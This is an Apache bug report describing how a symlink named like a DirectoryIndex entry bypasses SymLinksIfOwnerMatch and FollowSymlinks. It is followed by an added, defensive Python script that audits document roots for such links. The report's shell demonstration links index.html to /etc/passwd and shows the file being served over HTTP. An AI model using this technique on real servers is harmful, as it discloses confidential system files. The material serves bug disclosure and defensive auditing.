Apache ignores the SymLinksIfOwnerMatch and FollowSymlinks directives if the name of the symlink in question matches a valid value for DirectoryIndex.

Expected behaviour: 403 Forbidden, the symlink's target should not be delivered.

Observed behaviour: 200 OK, the symlink's target is delivered to the client.

Impact: this could prove a security problem, especially in shared hosting environments. It is possible to disclose confidential information by arbitrarily creating symlinks to files readable by the apache process.

Demonstration:

--- snip ---
xy@v1384:~/dev/test$ ls -la . /etc/passwd
-rw-r--r-- 1 root root 1570 2009-03-23 11:06 /etc/passwd

.:
total 3
drwxr-xr-x 2 xy xy 1024 2009-06-09 16:50 .
drwxr-xr-x 5 xy xy 1024 2009-06-09 16:31 ..
-rw-r--r-- 1 xy xy 29 2009-06-09 16:48 .htaccess
lrwxrwxrwx 1 xy xy 11 2009-06-09 16:47 index.html -> /etc/passwd
lrwxrwxrwx 1 xy xy 11 2009-06-09 16:50 symlink -> /etc/passwd
xy@v1384:~/dev/test$ cat .htaccess
Options SymLinksIfOwnerMatch
xy@v1384:~/dev/test$ curl --head http://dev.truschnigg.info/test/symlink
HTTP/1.1 403 Forbidden
Date: Tue, 09 Jun 2009 15:36:52 GMT
Server: Apache
Content-Type: text/html; charset=iso-8859-1

xy@v1384:~/dev/test$ curl --head http://dev.truschnigg.info/test/index.html
HTTP/1.1 403 Forbidden
Date: Tue, 09 Jun 2009 15:37:00 GMT
Server: Apache
Content-Type: text/html; charset=iso-8859-1

xy@v1384:~/dev/test$ curl --head http://dev.truschnigg.info/test/
HTTP/1.1 200 OK
Date: Tue, 09 Jun 2009 15:37:03 GMT
Server: Apache
Last-Modified: Mon, 23 Mar 2009 10:06:27 GMT
ETag: "f979d3e-622-465c66b6bcec0"
Accept-Ranges: bytes
Content-Length: 1570
Content-Type: text/html
--- snip ---

The above behaviour is the same if FollowSymlinks, instead of SymLinksIfOwnerMatch, is used to restrict access.

This is reproducible on Apache 2.2.9 (Debian Stable) and 2.2.11 (Gentoo ~x86).
This looks like a dupe of bug 45959. A patch was applied in r733754 to the 2.2 branch, which should fix the issue since vers. 2.2.12 (not released yet).

*** This bug has been marked as a duplicate of bug 45959 ***
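An audit for the condition reported above, as an added example that is not part of the original bug report or of Apache's own code: it walks a document root and lists symlinks whose name matches a DirectoryIndex value and whose target has a different owner or resolves outside the root. The function names, the default index names and the sample tree are assumptions made for illustration.

```python
import os
import tempfile

# Assumption: replace with the DirectoryIndex values configured on the server.
INDEX_NAMES = ("index.html", "index.htm", "index.php")

def audit_index_symlinks(docroot, index_names=INDEX_NAMES):
    """List symlinks named like a DirectoryIndex entry that an owner-match
    check should refuse (owner differs) or that leave the document root."""
    root = os.path.realpath(docroot)
    findings = []
    for dirpath, dirs, files in os.walk(root):  # directory links are not followed
        for name in dirs + files:
            path = os.path.join(dirpath, name)
            if name not in index_names or not os.path.islink(path):
                continue
            target = os.path.realpath(path)
            try:
                target_uid = os.stat(target).st_uid
            except OSError:
                continue  # dangling link: nothing can be served through it
            outside = os.path.commonpath([root, target]) != root
            mismatch = target_uid != os.lstat(path).st_uid
            if outside or mismatch:
                findings.append({"link": path, "target": target,
                                 "owner_mismatch": mismatch,
                                 "outside_root": outside})
    return findings

def build_sample_tree():
    """Constructed sample mirroring the report's layout in a temp directory."""
    base = tempfile.mkdtemp()
    docroot = os.path.join(base, "htdocs")
    os.makedirs(os.path.join(docroot, "test"))
    secret = os.path.join(base, "secret.txt")  # stands in for /etc/passwd
    with open(secret, "w") as fh:
        fh.write("constructed sample data\n")
    os.symlink(secret, os.path.join(docroot, "test", "index.html"))
    os.symlink(secret, os.path.join(docroot, "test", "symlink"))
    with open(os.path.join(docroot, "index.htm"), "w") as fh:
        fh.write("regular file, not a link\n")
    return docroot

if __name__ == "__main__":
    for finding in audit_index_symlinks(build_sample_tree()):
        print(finding)
```

The link named `symlink` is not reported because, as the demonstration shows, requests for it are already refused; only names that DirectoryIndex resolves are affected.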